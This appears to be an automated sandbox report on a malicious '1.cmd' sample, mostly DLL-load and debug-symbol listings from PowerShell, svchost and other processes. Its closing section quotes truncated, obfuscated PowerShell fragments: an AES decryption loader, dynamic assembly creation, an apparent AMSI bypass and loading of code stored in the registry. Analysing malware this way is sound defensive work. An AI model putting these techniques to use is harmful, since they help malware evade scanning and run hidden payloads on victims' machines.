Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 1.cmdStatic file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=fa30d40e-d0d2-4405-85db-7bb3a1a8c1b8HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](
Obfuscated command line found
